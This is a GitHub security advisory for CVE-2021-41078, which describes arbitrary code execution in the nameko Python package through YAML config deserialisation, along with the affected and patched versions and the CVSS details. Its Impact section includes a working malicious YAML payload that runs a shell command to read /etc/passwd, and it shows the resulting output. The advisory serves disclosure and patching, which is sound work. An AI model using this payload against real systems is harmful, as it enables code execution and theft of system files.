Skip to content

Nameko Arbitrary code execution due to YAML deserialization

High severity GitHub Reviewed Published Oct 19, 2021 in nameko/nameko • Updated Sep 1, 2023

Package

pip nameko (pip)

Affected versions

< 2.14.0
>= 3.0.0rc0, <= 3.0.0rc9

Patched versions

2.14.0
3.0.0rc10

Description

Impact

Nameko can be tricked to perform arbitrary code execution when deserialising a YAML config file. Example:

# malicious.yaml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
$ nameko run --config malicious.yaml test
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
... 

Patches

The problem was fixed in nameko/nameko#722 and released in version 2.14.0, and in rc10 of the v3 pre-release.

Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable.

Workarounds

The vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.

References

@mattbennett mattbennett published to nameko/nameko Oct 19, 2021
Reviewed Oct 19, 2021
Published to the GitHub Advisory Database Oct 19, 2021
Published by the National Vulnerability Database Oct 26, 2021
Last updated Sep 1, 2023

Severity

High
8.6
/ 10

CVSS base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2021-41078

GHSA ID

GHSA-6p52-jr3q-c94g

Source code

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.